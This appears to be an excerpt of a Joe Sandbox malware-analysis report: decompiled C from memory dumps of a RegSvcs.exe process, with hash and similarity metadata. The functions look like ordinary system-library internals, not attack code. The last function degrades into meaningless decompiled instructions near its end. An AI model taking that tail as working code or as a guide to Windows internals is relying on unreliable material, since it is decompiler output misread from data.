                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 73d0303b56c4a82cc0ed7a5d7fd0abd724f9e4b93a384a4ee35185f45d206f0d
                                          • Instruction ID: 2ca753bf154ee81674e42c2bbb0947f52d51a89b6a5bd4b04158d3a92d6c0f12
                                          • Opcode Fuzzy Hash: 73d0303b56c4a82cc0ed7a5d7fd0abd724f9e4b93a384a4ee35185f45d206f0d
                                          • Instruction Fuzzy Hash: 1B419271A001299BCB14CF9DC881ABEB7F9FF88218B15412AE915EB644E730DD05CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E013A3D40(intOrPtr __ecx, char* __edx) {
                                          				signed int _v8;
                                          				char* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				char _v29;
                                          				intOrPtr* _v32;
                                          				char _v36;
                                          				char _v37;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				char* _t34;
                                          				intOrPtr* _t37;
                                          				intOrPtr* _t42;
                                          				intOrPtr* _t47;
                                          				intOrPtr* _t48;
                                          				intOrPtr* _t49;
                                          				char _t51;
                                          				void* _t52;
                                          				intOrPtr* _t53;
                                          				char* _t55;
                                          				char _t59;
                                          				char* _t61;
                                          				intOrPtr* _t64;
                                          				void* _t65;
                                          				char* _t67;
                                          				void* _t68;
                                          				signed int _t70;
                                          
                                          				_t62 = __edx;
                                          				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                                          				_v8 =  *0x13ed360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                                          				_t34 =  &_v28;
                                          				_v20 = __ecx;
                                          				_t67 = __edx;
                                          				_v24 = _t34;
                                          				_t51 = 0;
                                          				_v12 = __edx;
                                          				_v29 = 0;
                                          				_v28 = _t34;
                                          				E01312280(_t34, 0x13e8a6c);
                                          				_t64 =  *0x13e5768; // 0x77e45768
                                          				if(_t64 != 0x13e5768) {
                                          					while(1) {
                                          						_t8 = _t64 + 8; // 0x77e45770
                                          						_t42 = _t8;
                                          						_t53 = _t64;
                                          						 *_t42 =  *_t42 + 1;
                                          						_v16 = _t42;
                                          						E0130FFB0(_t53, _t64, 0x13e8a6c);
                                          						 *0x13eb1e0(_v24, _t67);
                                          						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                                          							_v37 = 1;
                                          						}
                                          						E01312280(_t45, 0x13e8a6c);
                                          						_t47 = _v28;
                                          						_t64 =  *_t64;
                                          						 *_t47 =  *_t47 - 1;
                                          						if( *_t47 != 0) {
                                          							goto L8;
                                          						}
                                          						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                                          							L10:
                                          							_push(3);
                                          							asm("int 0x29");
                                          						} else {
                                          							_t48 =  *((intOrPtr*)(_t53 + 4));
                                          							if( *_t48 != _t53) {
                                          								goto L10;
                                          							} else {
                                          								 *_t48 = _t64;
                                          								_t61 =  &_v36;
                                          								 *((intOrPtr*)(_t64 + 4)) = _t48;
                                          								_t49 = _v32;
                                          								if( *_t49 != _t61) {
                                          									goto L10;
                                          								} else {
                                          									 *_t53 = _t61;
                                          									 *((intOrPtr*)(_t53 + 4)) = _t49;
                                          									 *_t49 = _t53;
                                          									_v32 = _t53;
                                          									goto L8;
                                          								}
                                          							}
                                          						}
                                          						L11:
                                          						_t51 = _v29;
                                          						goto L12;
                                          						L8:
                                          						if(_t64 != 0x13e5768) {
                                          							_t67 = _v20;
                                          							continue;
                                          						}
                                          						goto L11;
                                          					}
                                          				}
                                          				L12:
                                          				E0130FFB0(_t51, _t64, 0x13e8a6c);
                                          				while(1) {
                                          					_t37 = _v28;
                                          					_t55 =  &_v28;
                                          					if(_t37 == _t55) {
                                          						break;
                                          					}
                                          					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                                          						goto L10;
                                          					} else {
                                          						_t59 =  *_t37;
                                          						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                                          							goto L10;
                                          						} else {
                                          							_t62 =  &_v28;
                                          							_v28 = _t59;
                                          							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                                          							L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                                          							continue;
                                          						}
                                          					}
                                          					L18:
                                          				}
                                          				_pop(_t65);
                                          				_pop(_t68);
                                          				_pop(_t52);
                                          				return E0133B640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                                          				goto L18;
                                          			}


































                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: c7f08ee81219e9ede0a749348b42b43370eb114aa3ce3eb018de01b963422956
                                          • Instruction ID: 2fdd1819f737f6eaf72d5832e4845cc5272d5fe10b48be5b3341a46461d612e5
                                          • Opcode Fuzzy Hash: c7f08ee81219e9ede0a749348b42b43370eb114aa3ce3eb018de01b963422956
                                          • Instruction Fuzzy Hash: 9A31AB72549306CFC725DF28C48485ABBE5FF85708F44496EE5988B281D730DD08CBD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E01334A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed int* _v12;
                                          				char _v13;
                                          				signed int _v16;
                                          				char _v21;
                                          				signed int* _v24;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t29;
                                          				signed int* _t32;
                                          				signed int* _t41;
                                          				signed int _t42;
                                          				void* _t43;
                                          				intOrPtr* _t51;
                                          				void* _t52;
                                          				signed int _t53;
                                          				signed int _t58;
                                          				void* _t59;
                                          				signed int _t60;
                                          				signed int _t62;
                                          
                                          				_t49 = __edx;
                                          				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                          				_t26 =  *0x13ed360 ^ _t62;
                                          				_v8 =  *0x13ed360 ^ _t62;
                                          				_t41 = __ecx;
                                          				_t51 = __edx;
                                          				_v12 = __ecx;
                                          				if(_a4 == 0) {
                                          					if(_a8 != 0) {
                                          						goto L1;
                                          					}
                                          					_v13 = 1;
                                          					E01312280(_t26, 0x13e8608);
                                          					_t58 =  *_t41;
                                          					if(_t58 == 0) {
                                          						L11:
                                          						E0130FFB0(_t41, _t51, 0x13e8608);
                                          						L2:
                                          						 *0x13eb1e0(_a4, _a8);
                                          						_t42 =  *_t51();
                                          						if(_t42 == 0) {
                                          							_t29 = 0;
                                          							L5:
                                          							_pop(_t52);
                                          							_pop(_t59);
                                          							_pop(_t43);
                                          							return E0133B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                          						}
                                          						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                          						if(_v21 != 0) {
                                          							_t53 = 0;
                                          							E01312280(_t28, 0x13e8608);
                                          							_t32 = _v24;
                                          							if( *_t32 == _t58) {
                                          								 *_t32 = _t42;
                                          								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                          								if(_t58 != 0) {
                                          									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                          									asm("sbb edi, edi");
                                          									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                          								}
                                          							}
                                          							E0130FFB0(_t42, _t53, 0x13e8608);
                                          							if(_t53 != 0) {
                                          								L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                          							}
                                          						}
                                          						_t29 = _t42;
                                          						goto L5;
                                          					}
                                          					if( *((char*)(_t58 + 0x40)) != 0) {
                                          						L10:
                                          						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                          						E0130FFB0(_t41, _t51, 0x13e8608);
                                          						_t29 = _t58;
                                          						goto L5;
                                          					}
                                          					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                          					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                          						goto L11;
                                          					}
                                          					goto L10;
                                          				}
                                          				L1:
                                          				_v13 = 0;
                                          				_t58 = 0;
                                          				goto L2;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 45a6528825bbb808464569c2315b339272eae785249d1e992f2a6fd1b793f87e
                                          • Instruction ID: 80551e8d1824c8e211aaee6398e5494a1f20c04c2af8b2623d5c83cdb68e4329
                                          • Opcode Fuzzy Hash: 45a6528825bbb808464569c2315b339272eae785249d1e992f2a6fd1b793f87e
                                          • Instruction Fuzzy Hash: 2131FF326053159BE7329F18C944B2ABBE8FBC1B28F00446DE9564B685CBB0D806CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E01310050(void* __ecx) {
                                          				signed int _v8;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr* _t30;
                                          				intOrPtr* _t31;
                                          				signed int _t34;
                                          				void* _t40;
                                          				void* _t41;
                                          				signed int _t44;
                                          				intOrPtr _t47;
                                          				signed int _t58;
                                          				void* _t59;
                                          				void* _t61;
                                          				void* _t62;
                                          				signed int _t64;
                                          
                                          				_push(__ecx);
                                          				_v8 =  *0x13ed360 ^ _t64;
                                          				_t61 = __ecx;
                                          				_t2 = _t61 + 0x20; // 0x20
                                          				E01329ED0(_t2, 1, 0);
                                          				_t52 =  *(_t61 + 0x8c);
                                          				_t4 = _t61 + 0x8c; // 0x8c
                                          				_t40 = _t4;
                                          				do {
                                          					_t44 = _t52;
                                          					_t58 = _t52 & 0x00000001;
                                          					_t24 = _t44;
                                          					asm("lock cmpxchg [ebx], edx");
                                          					_t52 = _t44;
                                          				} while (_t52 != _t44);
                                          				if(_t58 == 0) {
                                          					L7:
                                          					_pop(_t59);
                                          					_pop(_t62);
                                          					_pop(_t41);
                                          					return E0133B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                          				}
                                          				asm("lock xadd [esi], eax");
                                          				_t47 =  *[fs:0x18];
                                          				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                          				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                          				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                          				if(_t30 != 0) {
                                          					if( *_t30 == 0) {
                                          						goto L4;
                                          					}
                                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          					L5:
                                          					if( *_t31 != 0) {
                                          						_t18 = _t61 + 0x78; // 0x78
                                          						E013C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                          					}
                                          					_t52 =  *(_t61 + 0x5c);
                                          					_t11 = _t61 + 0x78; // 0x78
                                          					_t34 = E01329702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                          					_t24 = _t34 | 0xffffffff;
                                          					asm("lock xadd [esi], eax");
                                          					if((_t34 | 0xffffffff) == 0) {
                                          						 *0x13eb1e0(_t61);
                                          						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                          					}
                                          					goto L7;
                                          				}
                                          				L4:
                                          				_t31 = 0x7ffe0386;
                                          				goto L5;
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 29bcbc35e025fb5eda9264b5b17d0c01dcdc07b766383d4fec343142251b9414
                                          • Instruction ID: 009882eedb41126f2f4a530f587195dd12bc6cb72d13e0a412bad4deae47c681
                                          • Opcode Fuzzy Hash: 29bcbc35e025fb5eda9264b5b17d0c01dcdc07b766383d4fec343142251b9414
                                          • Instruction Fuzzy Hash: B2318D31601B04CFD72ACF2CC840B96B7E9FF89718F14456DE5AA87A94EB75A841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E01322581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a1546912046) {
                                          				signed int _v8;
                                          				signed int _v16;
                                          				unsigned int _v24;
                                          				void* _v28;
                                          				signed int _v32;
                                          				unsigned int _v36;
                                          				signed int _v37;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				signed int _v56;
                                          				intOrPtr _v60;
                                          				signed int _v64;
                                          				signed int _v68;
                                          				signed int _v72;
                                          				signed int _v76;
                                          				signed int _v80;
                                          				signed int _t233;
                                          				signed char _t237;
                                          				signed char _t241;
                                          				signed int _t247;
                                          				signed int _t249;
                                          				intOrPtr _t251;
                                          				signed int _t254;
                                          				signed int _t261;
                                          				signed int _t264;
                                          				signed int _t272;
                                          				intOrPtr _t278;
                                          				signed int _t280;
                                          				signed int _t282;
                                          				void* _t283;
                                          				signed int _t284;
                                          				unsigned int _t287;
                                          				signed int _t291;
                                          				signed int* _t292;
                                          				signed int _t293;
                                          				signed int _t297;
                                          				intOrPtr _t309;
                                          				signed int _t318;
                                          				signed int _t320;
                                          				signed int _t321;
                                          				signed int _t325;
                                          				signed int _t326;
                                          				void* _t328;
                                          				signed int _t329;
                                          				signed int _t331;
                                          				signed int _t334;
                                          				void* _t335;
                                          				void* _t337;
                                          
                                          				_t331 = _t334;
                                          				_t335 = _t334 - 0x4c;
                                          				_v8 =  *0x13ed360 ^ _t331;
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t325 = 0x13eb2e8;
                                          				_v56 = _a4;
                                          				_v48 = __edx;
                                          				_v60 = __ecx;
                                          				_t287 = 0;
                                          				_v80 = 0;
                                          				asm("movsd");
                                          				_v64 = 0;
                                          				_v76 = 0;
                                          				_v72 = 0;
                                          				asm("movsd");
                                          				_v44 = 0;
                                          				_v52 = 0;
                                          				_v68 = 0;
                                          				asm("movsd");
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				asm("movsd");
                                          				_v16 = 0;
                                          				_t278 = 0x48;
                                          				_t307 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
                                          				_t318 = 0;
                                          				_v37 = _t307;
                                          				if(_v48 <= 0) {
                                          					L16:
                                          					_t45 = _t278 - 0x48; // 0x0
                                          					__eflags = _t45 - 0xfffe;
                                          					if(_t45 > 0xfffe) {
                                          						_t326 = 0xc0000106;
                                          						goto L32;
                                          					} else {
                                          						_t325 = L01314620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
                                          						_v52 = _t325;
                                          						__eflags = _t325;
                                          						if(_t325 == 0) {
                                          							_t326 = 0xc0000017;
                                          							goto L32;
                                          						} else {
                                          							 *(_t325 + 0x44) =  *(_t325 + 0x44) & 0x00000000;
                                          							_t50 = _t325 + 0x48; // 0x48
                                          							_t320 = _t50;
                                          							_t307 = _v32;
                                          							 *((intOrPtr*)(_t325 + 0x3c)) = _t278;
                                          							_t280 = 0;
                                          							 *((short*)(_t325 + 0x30)) = _v48;
                                          							__eflags = _t307;
                                          							if(_t307 != 0) {
                                          								 *(_t325 + 0x18) = _t320;
                                          								__eflags = _t307 - 0x13e8478;
                                          								 *_t325 = ((0 | _t307 == 0x013e8478) - 0x00000001 & 0xfffffffb) + 7;
                                          								E0133F3E0(_t320,  *((intOrPtr*)(_t307 + 4)),  *_t307 & 0x0000ffff);
                                          								_t307 = _v32;
                                          								_t335 = _t335 + 0xc;
                                          								_t280 = 1;
                                          								__eflags = _a8;
                                          								_t320 = _t320 + (( *_t307 & 0x0000ffff) >> 1) * 2;
                                          								if(_a8 != 0) {
                                          									_t272 = E013839F2(_t320);
                                          									_t307 = _v32;
                                          									_t320 = _t272;
                                          								}
                                          							}
                                          							_t291 = 0;
                                          							_v16 = 0;
                                          							__eflags = _v48;
                                          							if(_v48 <= 0) {
                                          								L31:
                                          								_t326 = _v68;
                                          								__eflags = 0;
                                          								 *((short*)(_t320 - 2)) = 0;
                                          								goto L32;
                                          							} else {
                                          								_t282 = _t325 + _t280 * 4;
                                          								_v56 = _t282;
                                          								do {
                                          									__eflags = _t307;
                                          									if(_t307 != 0) {
                                          										_t233 =  *(_v60 + _t291 * 4);
                                          										__eflags = _t233;
                                          										if(_t233 == 0) {
                                          											goto L30;
                                          										} else {
                                          											__eflags = _t233 == 5;
                                          											if(_t233 == 5) {
                                          												goto L30;
                                          											} else {
                                          												goto L22;
                                          											}
                                          										}
                                          									} else {
                                          										L22:
                                          										 *_t282 =  *(_v60 + _t291 * 4);
                                          										 *(_t282 + 0x18) = _t320;
                                          										_t237 =  *(_v60 + _t291 * 4);
                                          										__eflags = _t237 - 8;
                                          										if(_t237 > 8) {
                                          											goto L56;
                                          										} else {
                                          											switch( *((intOrPtr*)(_t237 * 4 +  &M01322959))) {
                                          												case 0:
                                          													__ax =  *0x13e8488;
                                          													__eflags = __ax;
                                          													if(__ax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__ax & 0x0000ffff = E0133F3E0(__edi,  *0x13e848c, __ax & 0x0000ffff);
                                          														__eax =  *0x13e8488 & 0x0000ffff;
                                          														goto L26;
                                          													}
                                          													goto L108;
                                          												case 1:
                                          													L45:
                                          													E0133F3E0(_t320, _v80, _v64);
                                          													_t267 = _v64;
                                          													goto L26;
                                          												case 2:
                                          													 *0x13e8480 & 0x0000ffff = E0133F3E0(__edi,  *0x13e8484,  *0x13e8480 & 0x0000ffff);
                                          													__eax =  *0x13e8480 & 0x0000ffff;
                                          													__eax = ( *0x13e8480 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													goto L28;
                                          												case 3:
                                          													__eax = _v44;
                                          													__eflags = __eax;
                                          													if(__eax == 0) {
                                          														goto L29;
                                          													} else {
                                          														__esi = __eax + __eax;
                                          														__eax = E0133F3E0(__edi, _v72, __esi);
                                          														__edi = __edi + __esi;
                                          														__esi = _v52;
                                          														goto L27;
                                          													}
                                          													goto L108;
                                          												case 4:
                                          													_push(0x2e);
                                          													_pop(__eax);
                                          													 *(__esi + 0x44) = __edi;
                                          													 *__edi = __ax;
                                          													__edi = __edi + 4;
                                          													_push(0x3b);
                                          													_pop(__eax);
                                          													 *(__edi - 2) = __ax;
                                          													goto L29;
                                          												case 5:
                                          													__eflags = _v36;
                                          													if(_v36 == 0) {
                                          														goto L45;
                                          													} else {
                                          														E0133F3E0(_t320, _v76, _v36);
                                          														_t267 = _v36;
                                          													}
                                          													L26:
                                          													_t335 = _t335 + 0xc;
                                          													_t320 = _t320 + (_t267 >> 1) * 2 + 2;
                                          													__eflags = _t320;
                                          													L27:
                                          													_push(0x3b);
                                          													_pop(_t269);
                                          													 *((short*)(_t320 - 2)) = _t269;
                                          													goto L28;
                                          												case 6:
                                          													__ebx =  *0x13e575c;
                                          													__eflags = __ebx - 0x13e575c;
                                          													if(__ebx != 0x13e575c) {
                                          														_push(0x3b);
                                          														_pop(__esi);
                                          														do {
                                          															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
                                          															E0133F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
                                          															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
                                          															__edi = __edi + __eax * 2;
                                          															__edi = __edi + 2;
                                          															 *(__edi - 2) = __si;
                                          															__ebx =  *__ebx;
                                          															__eflags = __ebx - 0x13e575c;
                                          														} while (__ebx != 0x13e575c);
                                          														__esi = _v52;
                                          														__ecx = _v16;
                                          														__edx = _v32;
                                          													}
                                          													__ebx = _v56;
                                          													goto L29;
                                          												case 7:
                                          													 *0x13e8478 & 0x0000ffff = E0133F3E0(__edi,  *0x13e847c,  *0x13e8478 & 0x0000ffff);
                                          													__eax =  *0x13e8478 & 0x0000ffff;
                                          													__eax = ( *0x13e8478 & 0x0000ffff) >> 1;
                                          													__eflags = _a8;
                                          													__edi = __edi + __eax * 2;
                                          													if(_a8 != 0) {
                                          														__ecx = __edi;
                                          														__eax = E013839F2(__ecx);
                                          														__edi = __eax;
                                          													}
                                          													goto L28;
                                          												case 8:
                                          													__eax = 0;
                                          													 *(__edi - 2) = __ax;
                                          													 *0x13e6e58 & 0x0000ffff = E0133F3E0(__edi,  *0x13e6e5c,  *0x13e6e58 & 0x0000ffff);
                                          													 *(__esi + 0x38) = __edi;
                                          													__eax =  *0x13e6e58 & 0x0000ffff;
                                          													__eax = ( *0x13e6e58 & 0x0000ffff) >> 1;
                                          													__edi = __edi + __eax * 2;
                                          													__edi = __edi + 2;
                                          													L28:
                                          													_t291 = _v16;
                                          													_t307 = _v32;
                                          													L29:
                                          													_t282 = _t282 + 4;
                                          													__eflags = _t282;
                                          													_v56 = _t282;
                                          													goto L30;
                                          											}
                                          										}
                                          									}
                                          									goto L108;
                                          									L30:
                                          									_t291 = _t291 + 1;
                                          									_v16 = _t291;
                                          									__eflags = _t291 - _v48;
                                          								} while (_t291 < _v48);
                                          								goto L31;
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					while(1) {
                                          						L1:
                                          						_t237 =  *(_v60 + _t318 * 4);
                                          						if(_t237 > 8) {
                                          							break;
                                          						}
                                          						switch( *((intOrPtr*)(_t237 * 4 +  &M01322935))) {
                                          							case 0:
                                          								__ax =  *0x13e8488;
                                          								__eflags = __ax;
                                          								if(__ax != 0) {
                                          									__eax = __ax & 0x0000ffff;
                                          									__ebx = __ebx + 2;
                                          									__eflags = __ebx;
                                          									goto L53;
                                          								}
                                          								goto L14;
                                          							case 1:
                                          								L44:
                                          								_t307 =  &_v64;
                                          								_v80 = E01322E3E(0,  &_v64);
                                          								_t278 = _t278 + _v64 + 2;
                                          								goto L13;
                                          							case 2:
                                          								__eax =  *0x13e8480 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x13e8480;
                                          									goto L80;
                                          								}
                                          								goto L14;
                                          							case 3:
                                          								__eax = E0130EEF0(0x13e79a0);
                                          								__eax =  &_v44;
                                          								_push(__eax);
                                          								_push(0);
                                          								_push(0);
                                          								_push(4);
                                          								_push(L"PATH");
                                          								_push(0);
                                          								L57();
                                          								__esi = __eax;
                                          								_v68 = __esi;
                                          								__eflags = __esi - 0xc0000023;
                                          								if(__esi != 0xc0000023) {
                                          									L10:
                                          									__eax = E0130EB70(__ecx, 0x13e79a0);
                                          									__eflags = __esi - 0xc0000100;
                                          									if(__esi == 0xc0000100) {
                                          										_v44 = _v44 & 0x00000000;
                                          										__eax = 0;
                                          										_v68 = 0;
                                          										goto L13;
                                          									} else {
                                          										__eflags = __esi;
                                          										if(__esi < 0) {
                                          											L32:
                                          											_t211 = _v72;
                                          											__eflags = _t211;
                                          											if(_t211 != 0) {
                                          												L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t211);
                                          											}
                                          											_t212 = _v52;
                                          											__eflags = _t212;
                                          											if(_t212 != 0) {
                                          												__eflags = _t326;
                                          												if(_t326 < 0) {
                                          													L013177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t212);
                                          													_t212 = 0;
                                          												}
                                          											}
                                          											goto L36;
                                          										} else {
                                          											__eax = _v44;
                                          											__ebx = __ebx + __eax * 2;
                                          											__ebx = __ebx + 2;
                                          											__eflags = __ebx;
                                          											L13:
                                          											_t287 = _v36;
                                          											goto L14;
                                          										}
                                          									}
                                          								} else {
                                          									__eax = _v44;
                                          									__ecx =  *0x13e7b9c; // 0x0
                                          									_v44 + _v44 =  *[fs:0x30];
                                          									__ecx = __ecx + 0x180000;
                                          									__eax = L01314620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
                                          									_v72 = __eax;
                                          									__eflags = __eax;
                                          									if(__eax == 0) {
                                          										__eax = E0130EB70(__ecx, 0x13e79a0);
                                          										__eax = _v52;
                                          										L36:
                                          										_pop(_t319);
                                          										_pop(_t327);
                                          										__eflags = _v8 ^ _t331;
                                          										_pop(_t279);
                                          										return E0133B640(_t212, _t279, _v8 ^ _t331, _t307, _t319, _t327);
                                          									} else {
                                          										__ecx =  &_v44;
                                          										_push(__ecx);
                                          										_push(_v44);
                                          										_push(__eax);
                                          										_push(4);
                                          										_push(L"PATH");
                                          										_push(0);
                                          										L57();
                                          										__esi = __eax;
                                          										_v68 = __eax;
                                          										goto L10;
                                          									}
                                          								}
                                          								goto L108;
                                          							case 4:
                                          								__ebx = __ebx + 4;
                                          								goto L14;
                                          							case 5:
                                          								_t274 = _v56;
                                          								if(_v56 != 0) {
                                          									_t307 =  &_v36;
                                          									_t276 = E01322E3E(_t274,  &_v36);
                                          									_t287 = _v36;
                                          									_v76 = _t276;
                                          								}
                                          								if(_t287 == 0) {
                                          									goto L44;
                                          								} else {
                                          									_t278 = _t278 + 2 + _t287;
                                          								}
                                          								goto L14;
                                          							case 6:
                                          								__eax =  *0x13e5764 & 0x0000ffff;
                                          								goto L53;
                                          							case 7:
                                          								__eax =  *0x13e8478 & 0x0000ffff;
                                          								__ebx = __ebx + __eax;
                                          								__eflags = _a8;
                                          								if(_a8 != 0) {
                                          									__ebx = __ebx + 0x16;
                                          									__ebx = __ebx + __eax;
                                          								}
                                          								__eflags = __dl;
                                          								if(__dl != 0) {
                                          									__eax = 0x13e8478;
                                          									L80:
                                          									_v32 = __eax;
                                          								}
                                          								goto L14;
                                          							case 8:
                                          								__eax =  *0x13e6e58 & 0x0000ffff;
                                          								__eax = ( *0x13e6e58 & 0x0000ffff) + 2;
                                          								L53:
                                          								__ebx = __ebx + __eax;
                                          								L14:
                                          								_t318 = _t318 + 1;
                                          								if(_t318 >= _v48) {
                                          									goto L16;
                                          								} else {
                                          									_t307 = _v37;
                                          									goto L1;
                                          								}
                                          								goto L108;
                                          						}
                                          					}
                                          					L56:
                                          					_t292 = 0x25;
                                          					asm("int 0x29");
                                          					asm("out 0x28, al");
                                          					asm("o16 sub [edx], dh");
                                          					asm("daa");
                                          					_t241 = (_t237 ^  *_t292) + _t335 ^  *_t292 ^  *[es:ecx];
                                          					_t328 = _t325 + 1;
                                          					 *_t307 =  *_t307 - _t307;
                                          					 *0x1f013226 =  *0x1f013226 + _t241;
                                          					_pop(_t283);
                                          					 *[ss:eax+ebp+0x5b350132] =  *[ss:eax+ebp+0x5b350132] + _t307;
                                          					 *[ss:edx] =  *[ss:edx] + _t241;
                                          					 *_t307 =  *_t307 - _t328;
                                          					 *((intOrPtr*)(_t241 - 0x9fecdd8)) =  *((intOrPtr*)(_t241 - 0x9fecdd8)) + _t241;
                                          					asm("daa");
                                          					_push(ds);
                                          					 *_t307 =  *_t307 - _t307;
                                          					 *((intOrPtr*)(_t328 + 0x28)) =  *((intOrPtr*)(_t328 + 0x28)) + _t292;
                                          					asm("daa");
                                          					asm("fcomp dword [ebx+0x36]");
                                          					 *((intOrPtr*)((_t241 ^  *_t292 ^  *_t292 ^  *_t292) +  &_a1546912046)) =  *((intOrPtr*)((_t241 ^  *_t292 ^  *_t292 ^  *_t292) +  &_a1546912046)) + _t328;
                                          					_t337 = _t335 + _t292;
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
                                          					asm("int3");
